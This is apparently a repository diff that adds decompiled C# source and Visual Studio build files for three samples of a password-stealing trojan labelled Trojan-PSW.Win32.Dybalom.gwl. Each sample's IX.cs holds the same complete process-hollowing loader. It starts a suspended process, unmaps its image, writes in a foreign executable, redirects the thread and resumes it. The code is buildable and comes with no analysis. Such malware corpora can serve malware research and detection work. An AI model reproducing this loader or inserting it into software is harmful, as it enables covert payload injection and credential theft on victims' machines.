GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: rern5947, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8B36B2BF-40BC-44F3-B93C-15B2B8352B1E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>rern5947</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "rern5947", "Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030.csproj", "{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}.Debug|Any CPU.Build.0 = Debug|Any CPU
{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}.Release|Any CPU.ActiveCfg = Release|Any CPU
{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: 3porhvzz, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2697C77-1B71-47DF-A403-2C1EF862C8A2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{95BBF3DA-5600-478B-B7E9-A65E32249CD4}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>3porhvzz</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "3porhvzz", "Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab.csproj", "{95BBF3DA-5600-478B-B7E9-A65E32249CD4}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{95BBF3DA-5600-478B-B7E9-A65E32249CD4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{95BBF3DA-5600-478B-B7E9-A65E32249CD4}.Debug|Any CPU.Build.0 = Debug|Any CPU
{95BBF3DA-5600-478B-B7E9-A65E32249CD4}.Release|Any CPU.ActiveCfg = Release|Any CPU
{95BBF3DA-5600-478B-B7E9-A65E32249CD4}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: 4tkhjivf, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 655E4C02-E074-4FB9-AD93-32224C96B5B7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{181646B5-7CD1-4783-B41A-63E8BB743BAA}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>4tkhjivf</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "4tkhjivf", "Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37.csproj", "{181646B5-7CD1-4783-B41A-63E8BB743BAA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{181646B5-7CD1-4783-B41A-63E8BB743BAA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{181646B5-7CD1-4783-B41A-63E8BB743BAA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{181646B5-7CD1-4783-B41A-63E8BB743BAA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{181646B5-7CD1-4783-B41A-63E8BB743BAA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal